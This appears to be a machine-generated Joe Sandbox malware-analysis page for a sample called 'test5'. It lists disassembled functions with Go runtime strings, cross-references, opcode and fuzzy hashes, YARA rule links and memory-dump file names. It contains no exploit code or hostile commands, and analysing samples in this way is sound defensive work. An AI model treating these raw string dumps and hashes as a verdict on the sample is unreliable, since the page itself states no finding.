String ID: mheap.sweepgen=runtime: nelems=workbuf is emptymSpanList.removemSpanList.insertbad special kindbad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod$ nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes status= etypes 48828125no anodenil PoolThursdaySaturdayFebruaryNovemberDecember%!Month(netedns0[::1]:53continue_gatewayinvalid address wsaioctlunixgramavx512bwavx512vltlsk$ previous allocCount=, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime:$ sweepgen= sweepgen , bound = , limit = exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine 12207031256103515625owner died$mspan.sweep: bad span state after sweepruntime: blocked write on free polldescPowerRegisterSuspendResumeNotification$sweep increased allocation countremovespecial on invalid pointergetWeakHandle on invalid pointerruntime: root level max pages = NtAssociateWaitCompletionPacket$sweep: tried to preserve a user arena spanruntime: blocked write on closing polldescacquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callon a locked thread with no template threadunexpected signal during runtime executiontraceSto$swept cached spanmarkBits overflowruntime: summary[runtime: level = , p.searchAddr = RtlGetCurrentPeb
API String ID: 0-2429654719
Opcode ID: 5b431e0dacbd4b23277376cc6de9614fa7696c0ce87dc4f21b09db5ceb8a867b
Instruction ID: f0872ff9524a5721e08f52c6e1ed480f7f0b33bffa00b942e854b4ab19fe0ded
Opcode Fuzzy Hash: 5b431e0dacbd4b23277376cc6de9614fa7696c0ce87dc4f21b09db5ceb8a867b
Instruction Fuzzy Hash: 1EF1F673208B9186CB50EF15E4903AE77A6F786B84F844126EB8D43766DF3CC995CB50

Function 006BE260 Relevance: 7.2, Strings: 5, Instructions: 942COMMON

Download Yara Rule

Strings

findrunnable: netpoll with psave on system g not allowednewproc1: newg missing stacknewproc1: new g is not GdeadFixedStack is not power-of-2missing stack in shrinkstack args stack map entries for invalid runtime symbol tableruntime: no module data for mismatch, xrefs: 006BF1A8
global runq empty with non-zero runqsizemust be able to track idle limiter eventruntime: SyscallN has too many argumentsgoroutine stack size is not a power of 213877787807814456755295395851135253906256938893903907228377647697925567626953125ryuFtoaFixed32 calle, xrefs: 006BF186
findrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime: newstack at runtime: newstack sp=runtime: confused by pcHeader.textStart= timer data corruption186264514923095703125931322574615478515625link has been severedpackage , xrefs: 006BF1CA
findrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9network dropped, xrefs: 006BF197
findrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of r, xrefs: 006BF1B9

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: findrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of r$findrunnable: netpoll with psave on system g not allowednewproc1: newg missing stacknewproc1: new g is not GdeadFixedStack is not power-of-2missing stack in shrinkstack args stack map entries for invalid runtime symbol tableruntime: no module data for mismatch$findrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9network dropped$findrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime: newstack at runtime: newstack sp=runtime: confused by pcHeader.textStart= timer data corruption186264514923095703125931322574615478515625link has been severedpackage $global runq empty with non-zero runqsizemust be able to track idle limiter eventruntime: SyscallN has too many argumentsgoroutine stack size is not a power of 213877787807814456755295395851135253906256938893903907228377647697925567626953125ryuFtoaFixed32 calle
API String ID: 0-1954245510
Opcode ID: fd6277bac395258e970f782220bb4edda94d5ff3369abbf4f9340d746068508f
Instruction ID: 79ce674681b9de3f4635fbb01ec963e45e7d8fa911a72a0f9640e559baa681ec
Opcode Fuzzy Hash: fd6277bac395258e970f782220bb4edda94d5ff3369abbf4f9340d746068508f
Instruction Fuzzy Hash: 7692D4B2205BC485EB71CF25E8903EAB366F785B54F48412ACA8D57765DF3DC885CB40

Function 006D8340 Relevance: 6.7, Strings: 5, Instructions: 450COMMON

Download Yara Rule

Strings

pc=+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=3125boolint8uintchanfunccallkind on JuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDTicmpigmpftpspop3smtpdial unixermssse3avx2bmi1bmi2xn--timebitsNameTypecx16sse2false<nil>Er, xrefs: 006D89B2
fp= gp= mp=) m=3125boolint8uintchanfunccallkind on JuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDTicmpigmpftpspop3smtpdial unixermssse3avx2bmi1bmi2xn--timebitsNameTypecx16sse2false<nil>ErrorntohsCall &"'httpsallowrangeclose:pathwritede, xrefs: 006D8972
...finptrobjgc %: gp *(in n= ) - NaN P m= MPC= < end > ]:???pc= G125625EOFintmapMayUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltcgodnsud, xrefs: 006D87B7
sp= sp: lr: fp= gp= mp=) m=3125boolint8uintchanfunccallkind on JuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDTicmpigmpftpspop3smtpdial unixermssse3avx2bmi1bmi2xn--timebitsNameTypecx16sse2false<nil>ErrorntohsCall &"'httpsallowrangeclose, xrefs: 006D8992
non-Go function at pc=4656612873077392578125argument list too longaddress already in usenetwork is unreachablecannot allocate memoryprotocol not availableprotocol not supportedremote address changedunexpected method stepSao Tome Standard TimeAleutian Standard , xrefs: 006D8ADB

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: fp= gp= mp=) m=3125boolint8uintchanfunccallkind on JuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDTicmpigmpftpspop3smtpdial unixermssse3avx2bmi1bmi2xn--timebitsNameTypecx16sse2false<nil>ErrorntohsCall &"'httpsallowrangeclose:pathwritede$ pc=+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=3125boolint8uintchanfunccallkind on JuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDTicmpigmpftpspop3smtpdial unixermssse3avx2bmi1bmi2xn--timebitsNameTypecx16sse2false<nil>Er$ sp= sp: lr: fp= gp= mp=) m=3125boolint8uintchanfunccallkind on JuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDTicmpigmpftpspop3smtpdial unixermssse3avx2bmi1bmi2xn--timebitsNameTypecx16sse2false<nil>ErrorntohsCall &"'httpsallowrangeclose$...finptrobjgc %: gp *(in n= ) - NaN P m= MPC= < end > ]:???pc= G125625EOFintmapMayUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltcgodnsud$non-Go function at pc=4656612873077392578125argument list too longaddress already in usenetwork is unreachablecannot allocate memoryprotocol not availableprotocol not supportedremote address changedunexpected method stepSao Tome Standard TimeAleutian Standard
API String ID: 0-4165251877
Opcode ID: 1a65a005d8feb5a770629186b82d9c06c17b696f12eb0f0e3d2a3d19198ba288
Instruction ID: 5a07ada250fcef370e92c62cbadc1896bef2dc5ecaef3a4e040c8b11561214df
Opcode Fuzzy Hash: 1a65a005d8feb5a770629186b82d9c06c17b696f12eb0f0e3d2a3d19198ba288
Instruction Fuzzy Hash: 3B22383261DBC089DBA09B25E4943AEB7A6F789B80F54511AEACD47B59CF39C481CB04

Function 00696D20 Relevance: 6.6, Strings: 5, Instructions: 352COMMON

Download Yara Rule

Strings

!= sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase, xrefs: 006972E5
&n, xrefs: 0069707C
p mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valueselectgo: bad wakeupsemaRoot rotateRight, xrefs: 0069730A
runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32, xrefs: 006972AC
flushGen MB goal, s.state = s.base()= heapGoal=GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= , xrefs: 006972C7

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase$ flushGen MB goal, s.state = s.base()= heapGoal=GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= $p mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valueselectgo: bad wakeupsemaRoot rotateRight$runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32$&n
API String ID: 0-61586829
Opcode ID: 1128e15416b57a761d4fd9fb98a154fdab725f19f0b5ae7078ccfe694b64b5ad
Instruction ID: 8cf005d6da5b7d7f337a99eb51362e5e890d2c13da2431dbb0a5f971de01ec7f
Opcode Fuzzy Hash: 1128e15416b57a761d4fd9fb98a154fdab725f19f0b5ae7078ccfe694b64b5ad
Instruction Fuzzy Hash: 7AF1B232309B8486DB50CF65F48139EB7AAF749750F44822AEA9D43BA6DF39C485CB44

Function 006B6EA0 Relevance: 6.6, Strings: 5, Instructions: 301COMMON

Download Yara Rule

Strings

, goid= s=nil (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type 19531259765625invaliduintptrChanDir Value>TuesdayJanuaryOctoberMUI_StdMUI_Dltwindowswsarecvwsasendl, xrefs: 006B72E5, 006B736F
suspendG from non-preemptible goroutineruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system calltraceback: unexpected SPWRITE function traceRegion: alloc with concurrent drop277555756156289135105907917022705078125transport endpoint is alre, xrefs: 006B73CA
, gp->atomicstatus=marking free object KiB work (eager), [controller reset]mspan.sweep: state=sysMemStat overflowbad sequence numberntdll.dll not foundwinmm.dll not foundruntime: g0 stack [panic during mallocpanic holding locksmissing deferreturnunexpected gp, xrefs: 006B7305
invalid g statuscastogscanstatusbad g transitionschedule: in cgoreflect mismatch untyped locals missing stackmapbad symbol tablenon-Go function not in ranges:23841857910156250123456789ABCDEFinvalid exchangeno route to hostinvalid argumentmessage too longobje, xrefs: 006B73B9
runtime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr frames elided..., locked to threadruntime.semacreateruntime.semawakeup298023223876953125operation canceledno child processesRFS specific erroridentifi, xrefs: 006B72C5

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: , goid= s=nil (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type 19531259765625invaliduintptrChanDir Value>TuesdayJanuaryOctoberMUI_StdMUI_Dltwindowswsarecvwsasendl$, gp->atomicstatus=marking free object KiB work (eager), [controller reset]mspan.sweep: state=sysMemStat overflowbad sequence numberntdll.dll not foundwinmm.dll not foundruntime: g0 stack [panic during mallocpanic holding locksmissing deferreturnunexpected gp$invalid g statuscastogscanstatusbad g transitionschedule: in cgoreflect mismatch untyped locals missing stackmapbad symbol tablenon-Go function not in ranges:23841857910156250123456789ABCDEFinvalid exchangeno route to hostinvalid argumentmessage too longobje$runtime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr frames elided..., locked to threadruntime.semacreateruntime.semawakeup298023223876953125operation canceledno child processesRFS specific erroridentifi$suspendG from non-preemptible goroutineruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system calltraceback: unexpected SPWRITE function traceRegion: alloc with concurrent drop277555756156289135105907917022705078125transport endpoint is alre
API String ID: 0-788059655
Opcode ID: 16a5b275843de8584f6ef7191081293e53e46c9d5c06cc83c17e72ae31cb8be0
Instruction ID: e84001188445d2d86c7f29cafb25c83e691ac13d435dfe3c6c1a3712ec159da3
Opcode Fuzzy Hash: 16a5b275843de8584f6ef7191081293e53e46c9d5c06cc83c17e72ae31cb8be0
Instruction Fuzzy Hash: EDD173B620CB8086DB50DB55F4417AABB66F789BD0F449166EF9D43B66CF38C481CB10

Function 0069D620 Relevance: 6.4, Strings: 5, Instructions: 178COMMON

Download Yara Rule

Strings

base of ) = <==GOGC] = pc=+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=3125boolint8uintchanfunccallkind on JuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDTicmpigmpftpspop3smtpdial unixermssse3avx2bmi1bmi2xn--timebitsName, xrefs: 0069D85B
runtime: marking free object addspecial on invalid pointerruntime: summary max pages = runtime: levelShift[level] = doRecordGoroutineProfile gp1=NtCreateWaitCompletionPacket, xrefs: 0069D7E7
marking free object KiB work (eager), [controller reset]mspan.sweep: state=sysMemStat overflowbad sequence numberntdll.dll not foundwinmm.dll not foundruntime: g0 stack [panic during mallocpanic holding locksmissing deferreturnunexpected gp.parampanic during , xrefs: 0069D89E
objgc %: gp *(in n= ) - NaN P m= MPC= < end > ]:???pc= G125625EOFintmapMayUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltcgodnsudpftpssh::, xrefs: 0069D876
greyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCom, xrefs: 0069D8AF

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: base of ) = <==GOGC] = pc=+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=3125boolint8uintchanfunccallkind on JuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDTicmpigmpftpspop3smtpdial unixermssse3avx2bmi1bmi2xn--timebitsName$greyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCom$marking free object KiB work (eager), [controller reset]mspan.sweep: state=sysMemStat overflowbad sequence numberntdll.dll not foundwinmm.dll not foundruntime: g0 stack [panic during mallocpanic holding locksmissing deferreturnunexpected gp.parampanic during $objgc %: gp *(in n= ) - NaN P m= MPC= < end > ]:???pc= G125625EOFintmapMayUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltcgodnsudpftpssh::$runtime: marking free object addspecial on invalid pointerruntime: summary max pages = runtime: levelShift[level] = doRecordGoroutineProfile gp1=NtCreateWaitCompletionPacket
API String ID: 0-260558280
Opcode ID: e7ba2c6f92e79187f52a96f01db108cfb22b97d84b5c04d37ef361dc417cbedd
Instruction ID: 3bccb4efd37948d65edf53db445e3bf6328c4faf280fffad30e15f5c5ee6ba31
Opcode Fuzzy Hash: e7ba2c6f92e79187f52a96f01db108cfb22b97d84b5c04d37ef361dc417cbedd
Instruction Fuzzy Hash: 9061BEB2618B8086DF509F11E8413A9BB6AF785B90F84513AEF8D07BA6CF3CC595C740

Function 00683B00 Relevance: 5.3, Strings: 4, Instructions: 294COMMON

Download Yara Rule

Strings

nd 3, xrefs: 00683B17
2-by, xrefs: 00683B26
expa, xrefs: 00683B08
te k, xrefs: 00683B35

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: 2-by$expa$nd 3$te k
API String ID: 0-3581043453
Opcode ID: d0a0678b136faf6cdae2b5bb443573c909990b14ac4f0b67f8b4f134291ae36c
Instruction ID: 4e8fa0b6b0a7216c9fca8576cbf9a12e3c0c72d5d03413782a84bff1b4e31085
Opcode Fuzzy Hash: d0a0678b136faf6cdae2b5bb443573c909990b14ac4f0b67f8b4f134291ae36c
Instruction Fuzzy Hash: DEB1B066F29FD94AF323A63810036B7EB185FFB9C9A40E327FC9474A87D72095036254

Function 006BB540 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

stopTheWorld: not stopped (status != _Pgcstop)signal arrived during external code executioncompileCallback: float arguments not supportedruntime: name offset base pointer out of rangeruntime: type offset base pointer out of rangeruntime: text offset base poin, xrefs: 006BB9A4
stopTheWorld: not stopped (stopwait != 0)34694469519536141888238489627838134765625strconv: illegal AppendInt/FormatInt basecan't call pointer on a non-pointer ValueMapIter.Next called on exhausted iteratortime: Reset called on uninitialized Timernet/url: inval, xrefs: 006BB8EA
stopTheWorld: holding locksgcstopm: not waiting for gcruntime: checkdead: nmidle=runtime: checkdead: find g runlock of unlocked rwmutexsigsend: inconsistent statemakeslice: len out of rangemakeslice: cap out of rangegrowslice: len out of rangestack size not a , xrefs: 006BBA05
stopTheWorld: broken CPU time accountingglobal runq empty with non-zero runqsizemust be able to track idle limiter eventruntime: SyscallN has too many argumentsgoroutine stack size is not a power of 2138777878078144567552953958511352539062569388939039072283776, xrefs: 006BB9BE

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
